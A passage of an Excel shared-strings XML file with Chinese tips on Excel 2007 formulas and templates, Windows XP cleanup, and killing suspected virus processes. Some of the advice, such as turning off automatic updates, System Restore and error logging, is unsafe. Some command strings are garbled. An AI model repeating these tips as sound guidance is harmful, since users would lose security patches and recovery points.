        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>另存为</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令，打开</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>另存为</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对话框；</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(3)</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>框中输入模板的名字，从</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保存类型</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>列表中选定</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模板</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＊</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.xlt)”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选项，这时</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保存位置</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>会自动切换到默认的模板文件夹</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Templates</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件夹；</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(4)</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保存位置</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中选择</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子表格模板</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件夹，单击</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保存</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>即可。这样，您就可以根据该模板快速创建新工作簿了。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>利用模板创建工作簿。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>excel 2007的工作界面：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Office按钮，快速访问工具栏、标题栏、窗口控制按钮、功能菜单选项卡、功能区、名称框、编辑栏、行标号、列标号、垂直滚动条、水平滚动条、工作表标签、状态栏、窗口视图控制区；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>将功能区的按钮添加到快速访问工具栏，只需将功能区的按钮右击添加即可；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>审阅---保护工作表；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>快速选择一张工作表：工作表标签滚动标签按钮：右键单击选择即可；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>取消隐藏工作表：开始---单元格：格式---可见性---隐藏和取消隐藏---取消隐藏工作表；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Excel中公式的运算符</t>
  </si>
  <si>
    <t>算术运算符：加减乘除等等</t>
  </si>
  <si>
    <t>比较运算符：大于、小于、等于、不等于等</t>
  </si>
  <si>
    <t>文本运算符：比如连接符号“&amp;”连接多个文本</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>引用运算符：如</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>SUM(A1:A30)</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中的冒号等等，逗号、空格；单元格引用表示单元格在工作表上所处位置的坐标集；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Excel</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自定义公式格式包括三个部分：</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 运算符：表示公式执行的运算方式；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 引用单元格：参加运算的单元格名称，可以直接输入，也可以用鼠标单据选择；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.5 公式转常量：F2---F9;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>　　Excel中所提的函数其实是一些预定义的公式，它们使用一些称为参数的特定数值按特定的顺序或结构进行计算。用户可以直接用它们对某个区域内的数值进行一系列运算，如分析和处理日期值和时间值、确定贷款的支付额、确定单元格中的数据类型、计算平均值、排序显示和运算文本数据等等。例如，SUM 函数对单元格或单元格区域进行加法运算。</t>
  </si>
  <si>
    <t>5 #DIV/0:当数字被0除时;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>6 #NAME?当不能识别公式中的文本时;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>7 #N/A:当数值对函数或公式不可用时;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>8 #NULL:当指定并不相交的两个区域的交点时;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cha0001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cha0002</t>
  </si>
  <si>
    <t>cha0003</t>
  </si>
  <si>
    <t>cha0004</t>
  </si>
  <si>
    <t>cha0005</t>
  </si>
  <si>
    <t>cha0006</t>
  </si>
  <si>
    <t>cha0007</t>
  </si>
  <si>
    <t>cha0008</t>
  </si>
  <si>
    <t>cha0009</t>
  </si>
  <si>
    <t>cha0010</t>
  </si>
  <si>
    <t>cha0011</t>
  </si>
  <si>
    <t>cha0012</t>
  </si>
  <si>
    <t>cha0013</t>
  </si>
  <si>
    <t>unit price</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sale qty</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sale sum</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 选择存放结果的单元格区域,输入公式:=C4:C16*D4:D16;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 ctrl+shift+enter;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在计算大量数据时,如果采用的计算公式相同,就可以利用数组公式进行计算;相应地可以提高计算的速度;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>item</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数组公式</t>
  </si>
  <si>
    <t>数组公式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">一、每天关机前要做的清洗: </t>
  </si>
  <si>
    <t>    双击“我的电脑”— —右键点C盘——点“属性”——点“磁盘清理”——点“确定”——再点“是”——再点“确定”。清理过程中，您可看得到未经您许可（您可点“查看文件”看，就知道了）进来的“临时文件”被清除了，盘的空间多了。对D，E，F盘也要用这法进行。</t>
  </si>
  <si>
    <t xml:space="preserve">二、随时要进行的清理 : </t>
  </si>
  <si>
    <t>    打开网页——点最上面一排里的“工具”——点“Internet选项”——再点中间的“Internet临时文件”中的“删除文件”——再在“删除所有脱机内容”前的方框里打上勾——再点“确定”——清完后又点“确定”。这样，可为打开网和空间提高速度。</t>
  </si>
  <si>
    <t xml:space="preserve">三、一星期进行的盘的垃圾清理 : </t>
  </si>
  <si>
    <t xml:space="preserve">    点“开始”——用鼠标指着“所有程序”，再指着“附件”，再指着“系统工具”，再点“磁盘粹片整理程序”——点C盘，再点“碎片整理”（这需要很长时间，最好在您去吃饭和没用电脑时进行。清理中您可看到您的盘里的状况，可将清理前后对比一下）——在跳出“清理完成”后点“关闭”。按上述，对D，E，F盘分别进行清理。 </t>
  </si>
  <si>
    <t>1.关闭"休眠"</t>
  </si>
  <si>
    <t>方法:打开[控制面板]→[电源选项]→[休眠],把"启用休眠"前面的勾去掉</t>
  </si>
  <si>
    <t>说明:休眠是系统长时间一种待机状态,使您在长时间离开电脑时保存操作状态,如果您不是经常开着电脑到别处去的话,那就把它关了吧!</t>
  </si>
  <si>
    <t>☆立即节省:256M</t>
  </si>
  <si>
    <t>2.关闭"系统还原"</t>
  </si>
  <si>
    <t>方法:打开[控制面板]→[系统]→[系统还原],把"在所有驱动器上关闭系统还原'勾上</t>
  </si>
  <si>
    <t>说明:系统还原是便于用户误操作或产生软件问题时的一种挽救手段,可以回复到误操作以前的状态.不建议初级用户使用.当然,它采用的是跟踪手段,需要记录大量信息,所消耗的资源也要很大的.</t>
  </si>
  <si>
    <t>☆立即节省:数百M (根据还原点的多少而不同)</t>
  </si>
  <si>
    <t>您也可以在不关闭系统还原的前提下,相应的减少系统还原所占的磁盘空间,这只会减少可用还原点的数目,一般还原点有一两个就够了吧.</t>
  </si>
  <si>
    <t xml:space="preserve">方法:...[系统还原]-选择一个"可用驱动器"-[设置]-调整"要使用的磁盘空间" </t>
  </si>
  <si>
    <t>3.关闭"远程管理"</t>
  </si>
  <si>
    <t>方法:打开[控制面板]→[系统]→[远程],把"允许从这台计算机发送远程协助邀请"前面的勾去掉.</t>
  </si>
  <si>
    <t>说明:谁会经常用到这种功能呢?它占用的不是磁盘空间,但是会影响系统运行速度.</t>
  </si>
  <si>
    <t xml:space="preserve">☆提高系统性能 </t>
  </si>
  <si>
    <t>4.关闭"自动更新"</t>
  </si>
  <si>
    <t>方法:打开[控制面板]→[自动更新]→选"关闭自动更新"</t>
  </si>
  <si>
    <t>说明:系统更新占用的也不是磁盘空间,您可以在有可用更新时到微软的更新页面上更新,而不是总需要一个进程监视那是不是有可用更新.</t>
  </si>
  <si>
    <t>5.关闭"索引服务"</t>
  </si>
  <si>
    <t>方法:[开始]→[运行]→输入"msconfig"→[服务] 去掉indexing servise前面的勾</t>
  </si>
  <si>
    <t>说明:索引服务是提高系统搜索速的的,谁没事总在系统里搜来搜去啊</t>
  </si>
  <si>
    <t>6.减少开机加载的启动项</t>
  </si>
  <si>
    <t>方法:[开始]→[运行]→输入"msconfig"→[启动] 去掉不必要的启动项</t>
  </si>
  <si>
    <t>说明:必要的启动项 一般"系统盘\windows\system32下的最好不要去掉;而肯定能去掉的有 TINTSETP IMJPMIG IMSCMIG QQ 等</t>
  </si>
  <si>
    <t xml:space="preserve">☆加快开机速度 </t>
  </si>
  <si>
    <t>7.合理设置虚拟内存</t>
  </si>
  <si>
    <t>方法:打开[控制面板]→[系统]→[高级]-[性能]设置-[高级]-[虚拟内存]更改-在"自定义大小"中填入数值</t>
  </si>
  <si>
    <t>说明:一般的最小值是物理内存的1.5倍,最大值是物理内存的3倍;如果您经常运行大型软件的话最小值应该设为(物理内存*1.5*0.2+物理内存*1.5),最大值应为(物理内存*3*0.2+物理内存*3)</t>
  </si>
  <si>
    <t>8.取消系统失败时的日志文件和询问</t>
  </si>
  <si>
    <t>打开[控制面板]→[系统]→[高级]→[启动和故障恢复]→[系统失败] 去掉"将事件写入系统日志""发送错误警报"</t>
  </si>
  <si>
    <t>9.删除无用的文件</t>
  </si>
  <si>
    <t>方法:打开[控制面板]→[文件夹选项]→[查看]→[显示所有文件和文件夹]</t>
  </si>
  <si>
    <t>C:\Documents and Settings\用户名\Cookies\除index文件外的所有文件(浏览网页产生的记录文件)</t>
  </si>
  <si>
    <t>C:\Documents and Settings\用户名\Local Settings\Temp\下的所有文件（用户临时文件）</t>
  </si>
  <si>
    <t>C:\Documents and Settings\用户名\LocalSettings\TemporaryInternet Files\下的所有文件(浏览网页记录的多媒体信息,加速以后浏览)</t>
  </si>
  <si>
    <t>C:\Documents and Settings\用户名\Local Settings\History\下的所有文件（访问历史纪录）</t>
  </si>
  <si>
    <t>C:\Documents and Settings\用户名\Recent\下的所有文件（最近浏览文件的快捷方式） C:\WINDOWS\Temp\下的所有文件（临时文件）</t>
  </si>
  <si>
    <t>C:\WINDOWS\ServicePackFiles下的所有文件（升级sp1或sp2后的备份文件）</t>
  </si>
  <si>
    <t>C:\WINDOWS\Driver Cache\i386下的压缩文件(驱动程序的备份文件)</t>
  </si>
  <si>
    <t>C:\WINDOWS\SoftwareDistribution\download下的所有文件(未完成的软件下载)</t>
  </si>
  <si>
    <t>C:\Windows\下以 $u... 开头的隐藏文件(微软更新安装文件备份)</t>
  </si>
  <si>
    <t xml:space="preserve">☆立即节省:数百M </t>
  </si>
  <si>
    <t>10.磁盘碎片整理</t>
  </si>
  <si>
    <t>下面该做的就是磁盘碎片整理了,只有整理之后才能获得更多的空间哦^_^</t>
  </si>
  <si>
    <t>方法:[开始]→[程序]→[附件]→[系统工具]→[磁盘碎片整理]...(记得先"分析"后"整理")</t>
  </si>
  <si>
    <t xml:space="preserve">1、使用朴素界面 </t>
  </si>
  <si>
    <t>　　XP安装后默认的界面包括任务栏、开始选单、桌面背景、窗口、按钮等都采用的是XP</t>
  </si>
  <si>
    <t>的豪华、炫目的风格，但缺点显而易见，它们将消耗掉不少系统资源，但实用意义不大。</t>
  </si>
  <si>
    <t>　　[方法]鼠标右键单击桌面空白处，在弹出选单点击“属性”进入显示属性设置窗口，</t>
  </si>
  <si>
    <t>将“主题、外观”都设置为“Windows经典”，将桌面背景设置为“无”，按确定保存退出</t>
  </si>
  <si>
    <t>。</t>
  </si>
  <si>
    <t xml:space="preserve">2、减少启动时加载项目 </t>
  </si>
  <si>
    <t>　　许多应用程序在安装时都会自作主张添加至系统启动组，每次启动系统都会自动运行</t>
  </si>
  <si>
    <t>，这不仅延长了启动时间，而且启动完成后系统资源已经被吃掉不少!</t>
  </si>
  <si>
    <t>[方法]选择“开始”选单的“运行”，键入“msconfig”启动“系统配置实用程序”，进</t>
  </si>
  <si>
    <t>入“启动”标，在此窗口列出了系统启动时加载的项目及来源，仔细查看你是否需要它自</t>
  </si>
  <si>
    <t>动加载，否则清除项目前的复选框，加载的项目愈少，启动的速度自然愈快。此项需要重</t>
  </si>
  <si>
    <t>新启动方能生效。</t>
  </si>
  <si>
    <t xml:space="preserve">3、优化视觉效果 </t>
  </si>
  <si>
    <t>　　[方法]选择“系统属性”中的“高级”标签进入“性能选项”界面，其中“视觉效果</t>
  </si>
  <si>
    <t>”中可供选择的包括:自动设置为最佳、最佳外观、最佳性能、自定义。选中的效果越多则</t>
  </si>
  <si>
    <t>占用的系统资源越多，选定“最佳性能”项将关闭列表中列出诸如淡入淡出、平滑滚动、</t>
  </si>
  <si>
    <t>滑动打开等所有视觉效果。</t>
  </si>
  <si>
    <t xml:space="preserve">4、关闭系统还原 </t>
  </si>
  <si>
    <t>　　默认情况下系统还原功能处于启用状态，每个驱动器约被占用高达4%～12%的硬盘空间</t>
  </si>
  <si>
    <t>，并且系统还原的监视系统会自动创建还原点，这样在后台运行就会占用较多的系统资源</t>
  </si>
  <si>
    <t>　　[方法]鼠标右键点击桌面“我的电脑”中的“属性”进入“系统属性”设置窗口，选</t>
  </si>
  <si>
    <t>择“系统还原”标签，将“在所有驱动器上关闭系统还原”置为选中状态 。</t>
  </si>
  <si>
    <t xml:space="preserve">5、加快选单显示速度 </t>
  </si>
  <si>
    <t>　　[方法]运行注册表编辑器，进入“HKEY_CURRENT_USERControl PanelDesktop”，将名</t>
  </si>
  <si>
    <t>称为MenuShowDelay的数据值由原来默认的400修改为0，修改后XP的开始选单、甚至应用软</t>
  </si>
  <si>
    <t xml:space="preserve">件的选单显示速度都会明显加快。 </t>
  </si>
  <si>
    <t xml:space="preserve">6、启用DMA传输模式 </t>
  </si>
  <si>
    <t>　　所谓DMA，即直接存储器存储模式，指计算机周边设备(主要指硬盘)可直接与内存交换</t>
  </si>
  <si>
    <t>数据，这样可加快硬盘读写速度，提高速据传输速率。</t>
  </si>
  <si>
    <t>　　[方法]选择“系统属性”中的“硬件”标签，打开“设备管理器”，其中“IDE控制器</t>
  </si>
  <si>
    <t>”有两项“Primary IDE Channel”及“Secondary IDE Channel”，依次进入“属性→高</t>
  </si>
  <si>
    <t>级设置”，该对话框会列出目前IDE接口所连接设备的传输模式，点击列表按钮将“传输模</t>
  </si>
  <si>
    <t>式”设置为“DMA(若可用。</t>
  </si>
  <si>
    <t>7、移动临时文件储存路径</t>
  </si>
  <si>
    <t>　　多数应用软件在运行时都会产生临时文件，而且这些临时文件都默认保存于启动分区</t>
  </si>
  <si>
    <t>C盘，长时间频繁读写C盘极易产生大量文件碎片，从而影响C盘性能，而C盘又是储存系统</t>
  </si>
  <si>
    <t>启动核心文件的分区，C盘的性能直接影响到系统的稳定性与运行效率。应尽量将应用软件</t>
  </si>
  <si>
    <t>安装于启动盘以外的分区并定期对硬盘进行整理，此举可最大程度避免产生磁盘碎片，将</t>
  </si>
  <si>
    <t>启动或读写速度保持在最佳状态。</t>
  </si>
  <si>
    <t>　　Internet Explorer临时文件夹</t>
  </si>
  <si>
    <t>　　[方法]在IE主窗口中，依次进入“工具→Internet选项→常规”标签，打开“Intern</t>
  </si>
  <si>
    <t>et临时文件”设置界面，点击“移动文件夹”按钮将原来保存于C盘的临时目录移动至C盘</t>
  </si>
  <si>
    <t>以外的驱动器中，如果你使用的是宽带，可将“临时文件夹”使用空间设置为最小值1M</t>
  </si>
  <si>
    <t>　　刻录时产生的临时文件</t>
  </si>
  <si>
    <t>　　[方法]文件在刻录之前都会保存于C盘的刻录临时文件夹中，进入资源管理器，选择刻</t>
  </si>
  <si>
    <t>录机盘符并单击鼠标右键选单的“属性”项，在“录制”标签下可将此临时文件夹安置于</t>
  </si>
  <si>
    <t>其它驱动器。</t>
  </si>
  <si>
    <t>　　我的文档</t>
  </si>
  <si>
    <t>　　[方法]鼠标右键点击“我的文档”，在属性设置项中可将“我的文档”默认的保存路</t>
  </si>
  <si>
    <t xml:space="preserve">径修改至其它盘符。 </t>
  </si>
  <si>
    <t>8、增加虚拟内存</t>
  </si>
  <si>
    <t>　　[方法]进入“性能选项”的“高级”设置窗口，首先将“处理器计划”及“内存使用</t>
  </si>
  <si>
    <t>”都调整为“程序”优化模式。点击“更改”按钮进入虚拟内存设置窗口，若你的内存大</t>
  </si>
  <si>
    <t>于256M，建议你禁用分页文件。默认的分页文件为物理内存的1.5倍。禁用系统缓存需重新</t>
  </si>
  <si>
    <t>启动系统。如果你的内存低于256M，请勿禁用分页文件，否则会导致系统崩溃或无法再启</t>
  </si>
  <si>
    <t xml:space="preserve">动XP! </t>
  </si>
  <si>
    <t xml:space="preserve">    windows使用时间长了，自然就会产生这样那样的临时文件，影响系统速度，让人烦心。对于老鸟来说，可以通过修改注册表、手动优化系统性能来提高速度，而对新手来说比较困难。这里我们可以下载一些专门的系统优化软件，进行一些简单的设计，就能达到我们想要的效果。这里我推荐一些常用又好使的软件：WINDOWS优化王、优化大师、超级兔子等。其中WINDOWS优化王非常好用，一看就会、功能全面、省时省心。 </t>
  </si>
  <si>
    <t>完全清理[ 毒 ]垃圾</t>
  </si>
  <si>
    <t>藏在XP中的一个秘密武器，可以完整清除垃圾文件</t>
  </si>
  <si>
    <t>你有用过Windows内置的清理磁盘功能吗？</t>
  </si>
  <si>
    <t>它并不能完全地清洗Windows内不需要的档案，因为它的功能被隐藏了，本篇将会把它被封印了的功能完全打开。适用的窗口板本 除了Win95及Win98外</t>
  </si>
  <si>
    <t>这个方法阶适用于Win98se、Win2000、WinME、WinXP</t>
  </si>
  <si>
    <t>现在介绍两个「清理磁盘」工具的指令：</t>
  </si>
  <si>
    <t>SAGESET 及 SAGERUN</t>
  </si>
  <si>
    <t>首先在「开始」&gt;「执行」 然后输入</t>
  </si>
  <si>
    <t xml:space="preserve">cleanmgr /sageset:99 </t>
  </si>
  <si>
    <t>设定:</t>
  </si>
  <si>
    <t>特别模式「清理磁盘」工具会执行，你会发觉多了很多清理选择，选择你想要清理的档案，通常全部都可以删除，完成你的选择后再按「确定」。然后再打开「开始」&gt;「运行」</t>
  </si>
  <si>
    <t>输入：cleanmgr /SAGERUN:99</t>
  </si>
  <si>
    <t>杀毒1</t>
  </si>
  <si>
    <t>这种情况往往表现在打开IE时，在IE界面的左下框里提示：正在打开网页，但老半天没响应。在任务管理器里查看进程，（进入方法，把鼠标放在任务栏上，按右键—任务管理器—进程）看看CPU的占用率如何，如果是100%，可以肯定，是感染了病毒，这时你想运行其他程序简直就是受罪。这就要查查是哪个进程贪婪地占用了CPU资源．找到后，最好把名称记录下来，然后点击结束，如果不能结束，则要启动到安全模式下把该东东删除，还要进入注册表里，（方法：开始—运行，输入regedit）在注册表对话框里，点编辑—查找，输入那个程序名，找到后，点鼠标右键删除，然后再进行几次的搜索，往往能彻底删除干净。</t>
  </si>
  <si>
    <t>杀毒2</t>
  </si>
  <si>
    <t>今天在这里为大家提供两则小技巧，以便帮你强行杀死顽固病毒进程。</t>
  </si>
  <si>
    <t>　　根据进程名查杀</t>
  </si>
  <si>
    <t>　　这种方法是通过WinXP系统下的taskkill命令来实现的，在使用该方法之前，首先需要打开系统的进程列表界面，找到病毒进程所对应的具体进程名。</t>
  </si>
  <si>
    <t>　　接着依次单击“开始→运行”命令，在弹出的系统运行框中，运行“cmd”命令；再在DOS命令行中输入“taskkill/imaaa”格式的字符串命令，单击回车键后，顽固的病毒进程“aaa”就被强行杀死了。比方说，要强行杀死“conime。exe”病毒进程，只要在命令提示符下执行“taskkill/imconime。exe”命令，要不了多久，系统就会自动返回结果。</t>
  </si>
  <si>
    <t>　　根据进程号查杀</t>
  </si>
  <si>
    <t>　　上面的方法，只对部分病毒进程有效，遇到一些更“顽固”的病毒进程，可能就无济于事了。此时你可以通过Win2000以上系统的内置命令——ntsd，来强行杀死一切病毒进程，因为该命令除System进程、SMSS。EXE进程、CSRSS。EXE进程不能“对付”外，基本可以对付其它一切进程。但是在使用该命令杀死病毒进程之前，需要先查找到对应病毒进程的具体进程号。</t>
  </si>
  <si>
    <t>　　考虑到系统进程列表界面在默认状态下，是不显示具体进程号的，因此你可以首先打开系统任务管理器窗口，再单击“查看”菜单项下面的“选择列”命令，在弹出的设置框中，将“PID(进程标志符)”选项选中，单击“确定”按钮。返回到系统进程列表页面中后，你就能查看到对应病毒进程的具体PID了。</t>
  </si>
  <si>
    <t>　　接着打开系统运行对话框，在其中运行“cmd”命令，在命令提示符状态下输入“ntsd-cq-pPID”命令，就可以强行将指定PID的病毒进程杀死了。例如，发现某个病毒进程的PID为“444”，那么可以执行“ntsd-cq-p444”命令，来杀死这个病毒进程。</t>
  </si>
  <si>
    <t>杀毒3</t>
  </si>
  <si>
    <t>Windows任务管理器是大家对进程进行管理的主要工具，在它的“进程”选项卡中能查看当前系统进程信息。在默认设置下，一般只能看到映像名称、用户名、CPU占用、内存使用等几项，而更多如I/O读写、虚拟内存大小等信息却被隐藏了起来。可别小看了这些被隐藏的信息，当系统出现莫名其妙的故障时，没准就能从它们中间找出突破口。</t>
  </si>
  <si>
    <t>1.查杀会自动消失的双进程木马</t>
  </si>
  <si>
